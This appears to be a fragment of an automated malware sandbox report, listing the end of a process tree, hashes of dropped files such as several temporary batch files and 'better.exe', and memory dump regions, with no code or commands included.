                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                      1⤵
                                                                        PID:2764
                                                                      • C:\Windows\system32\LogonUI.exe
                                                                        "LogonUI.exe" /flags:0x4 /state0:0xa384d855 /state1:0x41c64e6d
                                                                        1⤵
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:844

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        8f0271a63446aef01cf2bfc7b7c7976b

                                                                        SHA1

                                                                        b70dad968e1dda14b55ad361b7fd4ef9ab6c06d7

                                                                        SHA256

                                                                        da740d78ae00b72cb3710d1a1256dc6431550965d20afaa65e5d5860a4748e8c

                                                                        SHA512

                                                                        78a403c69f1284b7dd41527019f3eede3512a5e4d439d846eca83557b741ca37bcf56c412f3e577b9dd4cfa5a6d6210961215f14cb271b143f6eb94f69389cf5

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                        Filesize

                                                                        152B

                                                                        MD5

                                                                        37f660dd4b6ddf23bc37f5c823d1c33a

                                                                        SHA1

                                                                        1c35538aa307a3e09d15519df6ace99674ae428b

                                                                        SHA256

                                                                        4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8

                                                                        SHA512

                                                                        807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                        Filesize

                                                                        152B

                                                                        MD5

                                                                        d7cb450b1315c63b1d5d89d98ba22da5

                                                                        SHA1

                                                                        694005cd9e1a4c54e0b83d0598a8a0c089df1556

                                                                        SHA256

                                                                        38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031

                                                                        SHA512

                                                                        df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        e20a47f706f80a056e53010232ee858f

                                                                        SHA1

                                                                        a2e9fa119dc23c2cdf3e762bb6be31861e111556

                                                                        SHA256

                                                                        b041404a27e04a4b36f05b8b94dbc59f907694957bd14b341e9420813427d002

                                                                        SHA512

                                                                        abb77d15db9db5ab6800c80ed28f70047b70962e7a8ff2aa47a86371957565c20f450be81de5f82e377ca48fbc47d9e4c584a7c8efa8d77ae531ab28593f8c36

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                        Filesize

                                                                        7KB

                                                                        MD5

                                                                        0c958f92631f07694070124be5c61128

                                                                        SHA1

                                                                        7a6446c9cdb72587b9216b6c790700543f33530b

                                                                        SHA256

                                                                        29748ea0283d1e5d31c9e01398cb3d8dc66453adde8d8f6d372df234b8101d9d

                                                                        SHA512

                                                                        b98c5ee487ae289d5faeb6c5b69f76173f35399d212a70a9d2203267a1b7ddd0a38d1791ba45fc8b54b0d291214a1acbc61c535192713eb80f9667ed9e37103c

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                        Filesize

                                                                        5KB

                                                                        MD5

                                                                        914ce6023196f0f10153376eb47eaf4c

                                                                        SHA1

                                                                        c8589804e4730436611327b0535dc77bc6f1627f

                                                                        SHA256

                                                                        26606083b9cebd95dd5456c9f5bdb762ab052c3d3b3e69e176541dba9f79c213

                                                                        SHA512

                                                                        68165050c24e5f196a26f6c646815a31162fb0774af1bdd095c7d53034295aee496d3ac3adade1a200cee0b5a3afa4fddefa8ca01d103546c753a665bfd8aa89

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                        Filesize

                                                                        7KB

                                                                        MD5

                                                                        7f3aff36fa3d14f7e30b207c1aab0787

                                                                        SHA1

                                                                        701bf06908b607a01a13e33648b9f7c3e58cd7a9

                                                                        SHA256

                                                                        e8ab2d8672aeb8c3dd0bf4bd068d2b19bad22683309b0efd2b024a723f68a7b4

                                                                        SHA512

                                                                        d084cd9edf1d9cbd1e814bab1e6a53ee515b04241ae9bc9d5337c82f8d6562b47837e0fb8d0f6b756ac3b1a46d061462d68b99bf20aa0b6425be7ca1051a203b

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        de5d3967c56e24a1159668b1af4490c8

                                                                        SHA1

                                                                        b31db006a3737f30f55d804bd89fca8db5a0fcc9

                                                                        SHA256

                                                                        3e39d3d622a516f74bbe497d17047822c7b513402eec259c3f224d1e670fb158

                                                                        SHA512

                                                                        f7f9e6aad429278265c66d01c493ff64c34590cd016066f14e845edfe26a4af72700faf2f3e5682cf0702c8d67a8b51f6cbaec1ee0b053f97cbdf5225703a624

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        fc856d1bfa9e68157acdcd7fb159ae5b

                                                                        SHA1

                                                                        8a7741653c00d4c4db6d69f3350270c57237e1f9

                                                                        SHA256

                                                                        837bf5d8e28ebc7f97d973ab681ad984b938ea9f6e667951ad063d2f26fa5370

                                                                        SHA512

                                                                        402f62f1d39d055aea2cdbc7f4f80cc178cb4a752f09b062662c205a06ae22888d37760ebe09028fbd2fd239ac4314226965cab214fba2af15224abfdbe28d35

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe581577.TMP

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        e24e13ea4d7a2486d117e9a581552d89

                                                                        SHA1

                                                                        81c60f9695431ac3cccc56a784a9dc5202eb10f0

                                                                        SHA256

                                                                        3e276148a10d6dce4daf294adcb2ad386aaaa44e5978d26008c49c0125e59747

                                                                        SHA512

                                                                        6636290c5f0cf095214f9606ca2135ab5fff00ce4cf2670cc4e3a09fdaba195c2f69b38f9a0172e07d051d6a7fc8834ea52628b4e4323ef0e11f8652db2407d3

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                        Filesize

                                                                        16B

                                                                        MD5

                                                                        6752a1d65b201c13b62ea44016eb221f

                                                                        SHA1

                                                                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                        SHA256

                                                                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                        SHA512

                                                                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                        Filesize

                                                                        10KB

                                                                        MD5

                                                                        f2f51bd9566594248808d879893b1745

                                                                        SHA1

                                                                        a47efd7db0684e20fcd646bbb56ce1626a442d75

                                                                        SHA256

                                                                        1f0096683b28ef0d63331140e1cb1b9a2cedac9ba3c1c8289650ded0955867a0

                                                                        SHA512

                                                                        2c0df63268c7b7d408222fa4c9be06cfb6f6b1ee831863a44bac3e16b3ba65bbab50ec585df6dbd31bbd363e146b1a85868c4135ae459e63c8a9b42ca717f358

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                        Filesize

                                                                        10KB

                                                                        MD5

                                                                        d3b148631e053eaaf197f1ea0679f6fc

                                                                        SHA1

                                                                        a3dd3256b3916f2afc06e17ee515d21be2879c8a

                                                                        SHA256

                                                                        4ad089a1ffbba3b7e80cb113f4d61dab37bff3eddbe1853dafc975f7f48765a8

                                                                        SHA512

                                                                        788b92714345d67c79a0e1cf5aa24b1433c7646cb51c7f6c4847346d144808de8f83cfc0dc01c6266a6f0816a67152a929373787d4edc6de832a766199964d38

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                        Filesize

                                                                        8KB

                                                                        MD5

                                                                        efd5e243896cdd75c96ebd8ed51f576c

                                                                        SHA1

                                                                        0413927fbef66f2f9d880e0a6c833c4d784a5a75

                                                                        SHA256

                                                                        b5d813ca6a0979e6b65f04ab063618af05952d0bbf09be10cf4b675e650ca088

                                                                        SHA512

                                                                        49841b990753c96ad2431c3530e4c603d18e512307489c13634162174d4f763ab8f8ffa54f694ff043b8ad6b6d1dc1438bfee5cb87cf43eb1a011e75ce8b0b50

                                                                      • C:\Users\Admin\AppData\Local\Temp\1xKeyi5KcMKN.bat

                                                                        Filesize

                                                                        196B

                                                                        MD5

                                                                        eec05040a56e55811cbb93d85cf2a055

                                                                        SHA1

                                                                        32d5ef7f74c77aa4833163d43e4ac59e86f4f776

                                                                        SHA256

                                                                        f2ba755cb28789b2fb6b00b062f121678af97597318c759f23fe69cd8024a4c9

                                                                        SHA512

                                                                        8546b6f16d99be82a1efe65aee4629ef41e713fa60dedd7855190e3c2add15e236dc16d9eeae84cced6310fbd40651112454ce096ff2e4dcaa61acaa15f04bfd

                                                                      • C:\Users\Admin\AppData\Local\Temp\JKeFtiYCgpEc.bat

                                                                        Filesize

                                                                        196B

                                                                        MD5

                                                                        52d01f9bb22b11da5cb669d18b0f34cd

                                                                        SHA1

                                                                        2c53140b67c7b8e52ba8bc873985bee88488417f

                                                                        SHA256

                                                                        8a098e6c7dae430a50c57c7cc80b48fdc3a9cc43a3850a5df9a276781c011b20

                                                                        SHA512

                                                                        fc24c9ee01262aac391029d96655851abc6f9db9979ab67c3aca44f77f302e8c9041434cf1e2cf55b5d50eb1687d536256c9adb2b35f305b063ca1c8fc34f97d

                                                                      • C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe

                                                                        Filesize

                                                                        3.1MB

                                                                        MD5

                                                                        47ec64e3d129b23c44f417cbc2a07aa7

                                                                        SHA1

                                                                        e65fbcf69e6e808ebe7bc9b13e483c5fc80d5fa2

                                                                        SHA256

                                                                        ccb17adb4b57a95a61acb010c01da98dc150be67a85df2ab40ba9d1f078f8373

                                                                        SHA512

                                                                        52247a235b708e98efcf977fd109344e16df9c5a9f13ad5afd395df3f009d9ee6edf81fef9d74a31a9fdec1f851e61642912eb9bc8384b39042b70f9d8b7d510

                                                                      • C:\Users\Admin\AppData\Local\Temp\RwijEhf9UHIt.bat

                                                                        Filesize

                                                                        196B

                                                                        MD5

                                                                        ff79604660acb2f97fc3c297a1f8081d

                                                                        SHA1

                                                                        51305efacb3db85d4b56e2af8d42d0eea286033a

                                                                        SHA256

                                                                        301e6a16c5e51a5f5edc246626a446d11b8e693af70fb940144e94ab97004efd

                                                                        SHA512

                                                                        53d2b83c3f1c464658618aaf007f91157b31080f46a20b9c82e3fcbce91d8643a0da024c436eb04a401b3aa9fb45cb78a0f6312e8067531bc164b9498b935584

• C:\Users\Admin\AppData\Local\Temp\iLHdomMqQ84D.bat
  Filesize: 196B
  MD5: 10491b678d21c9434228ecc2b599c932
  SHA1: f6cfbb02c202c8bcaeeecd2a37ad6d0d4f0e9e55
  SHA256: 2a2f7da679033e1ba29dd5b4d00bf407ff2bc31639d59d743c3893f4731858d9
  SHA512: b91d8b8506cd35379dd5754bf20775bff5ee1f74aadaf599a1d6feba8091f3279b7df18aaa2254b80bd039e87ddb51628befb2af89cbb4d56474713ddaa086ee

• C:\Users\Admin\AppData\Local\Temp\oC8cbSowU7FX.bat
  Filesize: 196B
  MD5: a6e98a2b0dab2bd361df8607a43e0322
  SHA1: ebb1d170bf5cc1381cc1580a1c8e16be05becf1b
  SHA256: 1ebf11e7dbf5a2b4c03d9f845ec968e549e196e7e96adac5b63bf594117188ea
  SHA512: 74ce64aa7010ca0da21271a94b3beae93312066568fec236badeb9ccb1c62fdddb230e499c160851ddae917074605c9f0898f1c12a9aeb5ec834cb21419444d9

• C:\Users\Admin\AppData\Local\Temp\xzzIzv7WLRpb.bat
  Filesize: 196B
  MD5: 33fd8433cc0318f7050f30ef0b2d0ad5
  SHA1: 56b1d55d949a01530db0fe39e4d4cebb32deea91
  SHA256: fb8459860dc12feec05301fcb87c29c55e2c7375c8ac1d175387a8be31906207
  SHA512: 7e80895713a407fd5a45ccec401656a9040029d5abe746f1ecd090cf8dbddd3e512599017ffcd67e423f15b342037b67c708f06523196b4121dbb8a403571730

• memory/1980-56-0x0000000000C70000-0x0000000000F94000-memory.dmp
  Filesize: 3.1MB
• memory/4372-62-0x000000001C1D0000-0x000000001C220000-memory.dmp
  Filesize: 320KB
• memory/4372-63-0x000000001C2E0000-0x000000001C392000-memory.dmp
  Filesize: 712KB
• memory/4464-32-0x0000000006B60000-0x0000000006B7F000-memory.dmp
  Filesize: 124KB
• memory/4464-1-0x00000000070D0000-0x0000000007A55000-memory.dmp
  Filesize: 9.5MB
• memory/4464-52-0x0000000009B50000-0x0000000009B78000-memory.dmp
  Filesize: 160KB
• memory/4464-47-0x0000000009B20000-0x0000000009B43000-memory.dmp
  Filesize: 140KB
• memory/4464-49-0x0000000009B50000-0x0000000009B78000-memory.dmp
  Filesize: 160KB
• memory/4464-16-0x00000000069C0000-0x00000000069C6000-memory.dmp
  Filesize: 24KB
• memory/4464-69-0x0000000000B53000-0x0000000000B54000-memory.dmp
  Filesize: 4KB
• memory/4464-19-0x00000000069C0000-0x00000000069C6000-memory.dmp
  Filesize: 24KB
• memory/4464-23-0x00000000069B0000-0x00000000069BC000-memory.dmp
  Filesize: 48KB
• memory/4464-24-0x0000000006BE0000-0x0000000006C94000-memory.dmp
  Filesize: 720KB
• memory/4464-28-0x0000000006B80000-0x0000000006BBA000-memory.dmp
  Filesize: 232KB
• memory/4464-31-0x0000000006B80000-0x0000000006BBA000-memory.dmp
  Filesize: 232KB
• memory/4464-0-0x0000000000B53000-0x0000000000B54000-memory.dmp
  Filesize: 4KB
• memory/4464-44-0x0000000009B20000-0x0000000009B43000-memory.dmp
  Filesize: 140KB
• memory/4464-8-0x0000000008CC0000-0x00000000098A8000-memory.dmp
  Filesize: 11.9MB
• memory/4464-39-0x0000000006BC0000-0x0000000006BD5000-memory.dmp
  Filesize: 84KB
• memory/4464-40-0x0000000006B40000-0x0000000006B52000-memory.dmp
  Filesize: 72KB
• memory/4464-43-0x0000000006B40000-0x0000000006B52000-memory.dmp
  Filesize: 72KB
• memory/4464-27-0x0000000006BE0000-0x0000000006C94000-memory.dmp
  Filesize: 720KB
• memory/4464-20-0x00000000069B0000-0x00000000069BC000-memory.dmp
  Filesize: 48KB
• memory/4464-9-0x0000000000400000-0x0000000000440000-memory.dmp
  Filesize: 256KB
• memory/4464-36-0x0000000006BC0000-0x0000000006BD5000-memory.dmp
  Filesize: 84KB
• memory/4464-12-0x0000000006980000-0x0000000006991000-memory.dmp
  Filesize: 68KB
• memory/4464-15-0x0000000006980000-0x0000000006991000-memory.dmp
  Filesize: 68KB
• memory/4464-5-0x0000000008CC0000-0x00000000098A8000-memory.dmp
  Filesize: 11.9MB
• memory/4464-4-0x00000000070D0000-0x0000000007A55000-memory.dmp
  Filesize: 9.5MB
• memory/4464-35-0x0000000006B60000-0x0000000006B7F000-memory.dmp
  Filesize: 124KB